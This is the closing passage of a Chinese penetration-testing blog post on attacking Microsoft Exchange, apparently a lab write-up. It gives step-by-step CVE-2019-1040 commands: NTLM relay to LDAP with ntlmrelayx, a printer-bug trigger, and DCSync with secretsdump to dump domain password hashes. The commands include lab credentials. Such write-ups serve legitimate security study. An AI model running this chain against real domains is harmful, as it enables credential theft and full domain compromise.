<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 secretsdump.py c0okb/testMember:Buzhdiao250.@10.10.10.40 -dc-ip 10.10.10.10 -just-dc-user administrator</span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/column/194080.html">原理看这里</a></p>
<h2 id="CVE-2019-1040"><a href="#CVE-2019-1040" class="headerlink" title="CVE-2019-1040"></a>CVE-2019-1040</h2><p>用任何AD帐户，通过SMB连接到目标Exchange服务器，并触发SpoolService错误。目标服务器将通过SMB回连至攻击者主机，使用ntlmrelayx将SMB身份验证中继到LDAP。使用中继的LDAP身份验证，为攻击者帐户授予DCSync权限。攻击者帐户使用DCSync转储AD中的所有密码哈希值。</p>
<p>影响版本：<a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/107721.html">影响版本看这里</a></p>
<p>PS: 在测试过程中，发现累计更新版本过高的没法打</p>
<p>利用条件：已有域成员账号密码，存在一台exchange服务 </p>
<h3 id="方法一-2"><a href="#方法一-2" class="headerlink" title="方法一"></a>方法一</h3><p>利用工具：<a target="_blank" rel="noopener" href="https://github.com/SecureAuthCorp/impacket">impacket</a>，<a target="_blank" rel="noopener" href="https://github.com/dirkjanm/krbrelayx">printbug</a></p>
<p>（1）ntlmrelayx.py进行中继攻击</p>
<p>执行ntlmrelayx.py脚本进行NTLM中继攻击，设置SMB服务器并将认证凭据中继到LDAP协议。其中–remove-mic选项用于清除MIC标志，–escalate-user用于提升指定用户权限</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo python3 ntlmrelayx.py --escalate-user administrator -t ldap://<span class="number">10.10</span><span class="number">.10</span><span class="number">.10</span> -smb2support --remove-mic --delegate-access</span><br></pre></td></tr></table></figure>

<p><img src="/attach/image/19.png" alt="image-20210805123541060"></p>
<p>（2）触发SpoolService的bug</p>
<p>SpoolService的bug导致Exchange服务器回连到<code>ntlmrelayx.py</code>，即将NTLM认证信息发送到<code>ntlmrelayx.py</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 printerbug.py c0okb/administrator@<span class="number">10.10</span><span class="number">.10</span><span class="number">.40</span>  <span class="number">10.10</span><span class="number">.10</span><span class="number">.142</span></span><br></pre></td></tr></table></figure>

<p><img src="/attach/image/20.png" alt="image-20210805123617135"></p>
<p><img src="/attach/image/21.png" alt="image-20210805123647738"></p>
<p>（3）secretsdump.py去dcsync</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 secretsdump.py c0okb/administrator@<span class="number">10.10</span><span class="number">.10</span><span class="number">.10</span> -dc-ip <span class="number">10.10</span><span class="number">.10</span><span class="number">.10</span> -just-dc-user administrator</span><br></pre></td></tr></table></figure>

<p><img src="/attach/image/22.png" alt="image-20210805123747409"></p>
<p>PS:因为环境问题，所以复现过程直接用administrator演示。并且在复现过程中忽略内网代理这一步。</p>
<h3 id="方法二-2"><a href="#方法二-2" class="headerlink" title="方法二"></a>方法二</h3><p>工具：<a target="_blank" rel="noopener" href="https://github.com/Ridter/RelayX">RelayX</a></p>
<p>默认Exchange的服务权限较高，所以工具会利用Exchange的权限将当前用户增加Dcsync权限。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python3 relayx.py c0okb.cn/testMember:<span class="string">&#x27;Buzhidao250.&#x27;</span>@<span class="number">10.10</span><span class="number">.10</span><span class="number">.40</span> -r <span class="number">10.10</span><span class="number">.10</span><span class="number">.142</span> -dc-ip <span class="number">10.10</span><span class="number">.10</span><span class="number">.40</span></span><br></pre></td></tr></table></figure>

<p>PS: 方法一和方法二实际上是一样的，方法二的工具将ntlm-relay和printBug集成在一起，方便使用</p>

    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>北京基地
  </li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="https://blog.rizhan.icu/2021/08/06/Exchange%E6%B8%97%E9%80%8F%E6%80%BB%E7%BB%93/" title="Exchange渗透总结">https://blog.rizhan.icu/2021/08/06/Exchange渗透总结/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> unless stating additionally.
  </li>
</ul>
</div>


      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2021/08/06/%E5%86%85%E5%AD%98%E5%8A%A0%E8%BD%BDCS-Stageless%E8%BF%9B%E8%A1%8C%E5%85%8D%E6%9D%80/" rel="prev" title="内存加载CS-Stageless进行免杀">
      <i class="fa fa-chevron-left"></i> 内存加载CS-Stageless进行免杀
    </a></div>
      <div class="post-nav-item">
    <a href="/2021/08/09/%E4%B8%80%E6%AC%A1%E9%80%9A%E8%BF%87RDP%E4%BC%9A%E8%AF%9D%E5%8A%AB%E6%8C%81%E7%BB%88%E7%BB%93%E7%9A%84%E5%86%85%E7%BD%91%E6%BC%AB%E6%B8%B8/" rel="next" title="一次通过RDP会话劫持终结的内网漫游">
      一次通过RDP会话劫持终结的内网漫游 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%8F%91%E7%8E%B0Exchange"><span class="nav-number">2.</span> <span class="nav-text">发现Exchange</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%AB%AF%E5%8F%A3%E6%89%AB%E6%8F%8F%E6%8E%A2%E6%B5%8B"><span class="nav-number">2.1.</span> <span class="nav-text">端口扫描探测</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%89%B9%E6%AE%8A%E5%90%8E%E7%BC%80"><span class="nav-number">2.2.</span> <span class="nav-text">特殊后缀</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%89%B9%E6%AE%8A%E5%9F%9F%E5%90%8D"><span class="nav-number">2.3.</span> <span class="nav-text">特殊域名</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9F%A5%E7%9C%8BExchange%E7%89%88%E6%9C%AC"><span class="nav-number">2.4.</span> <span class="nav-text">查看Exchange版本</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Exchange%E8%B4%A6%E5%8F%B7%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="nav-number">3.</span> <span class="nav-text">Exchange账号密码爆破</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%94%B6%E9%9B%86%E9%82%AE%E7%AE%B1%E4%BF%A1%E6%81%AF"><span class="nav-number">3.1.</span> <span class="nav-text">收集邮箱信息</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8AutoDiscover%E6%8E%A5%E5%8F%A3%E8%BF%9B%E8%A1%8C%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="nav-number">3.2.</span> <span class="nav-text">利用AutoDiscover接口进行密码爆破</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8owa%E6%8E%A5%E5%8F%A3%E8%BF%9B%E8%A1%8C%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="nav-number">3.3.</span> <span class="nav-text">利用owa接口进行密码爆破</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8ews%E6%8E%A5%E5%8F%A3%E8%BF%9B%E8%A1%8C%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="nav-number">3.4.</span> <span class="nav-text">利用ews接口进行密码爆破</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8Microsoft-Server-ActiveSync%E6%8E%A5%E5%8F%A3%E8%BF%9B%E8%A1%8C%E5%AF%86%E7%A0%81%E7%88%86%E7%A0%B4"><span class="nav-number">3.5.</span> <span class="nav-text">利用Microsoft-Server-ActiveSync接口进行密码爆破</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Exchange-%E5%8E%86%E5%8F%B2%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93"><span class="nav-number">4.</span> <span class="nav-text">Exchange 历史漏洞总结</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2021-34473"><span class="nav-number">4.1.</span> <span class="nav-text">CVE-2021-34473</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2021-28482"><span class="nav-number">4.2.</span> <span class="nav-text">CVE-2021-28482</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2021-26855"><span class="nav-number">4.3.</span> <span class="nav-text">CVE-2021-26855</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2020-17144"><span class="nav-number">4.4.</span> <span class="nav-text">CVE-2020-17144</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2020-16875"><span class="nav-number">4.5.</span> <span class="nav-text">CVE-2020-16875</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80"><span class="nav-number">4.5.1.</span> <span class="nav-text">方法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C"><span class="nav-number">4.5.2.</span> <span class="nav-text">方法二</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2020-0688"><span class="nav-number">4.6.</span> <span class="nav-text">CVE-2020-0688</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#Exchange%E5%86%85%E7%BD%91%E5%88%A9%E7%94%A8"><span class="nav-number">5.</span> <span class="nav-text">Exchange内网利用</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2018-8581"><span class="nav-number">5.1.</span> <span class="nav-text">CVE-2018-8581</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80-1"><span class="nav-number">5.1.1.</span> <span class="nav-text">方法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C-1"><span class="nav-number">5.1.2.</span> <span class="nav-text">方法二</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#CVE-2019-1040"><span class="nav-number">5.2.</span> <span class="nav-text">CVE-2019-1040</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%B8%80-2"><span class="nav-number">5.2.1.</span> <span class="nav-text">方法一</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%96%B9%E6%B3%95%E4%BA%8C-2"><span class="nav-number">5.2.2.</span> <span class="nav-text">方法二</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">QAX Z-Team</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">6</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">categories</span></a>
      </div>
  </nav>
</div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">QAX Z-Team</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://muse.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a>
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="Total Visitors">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="Total Views">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
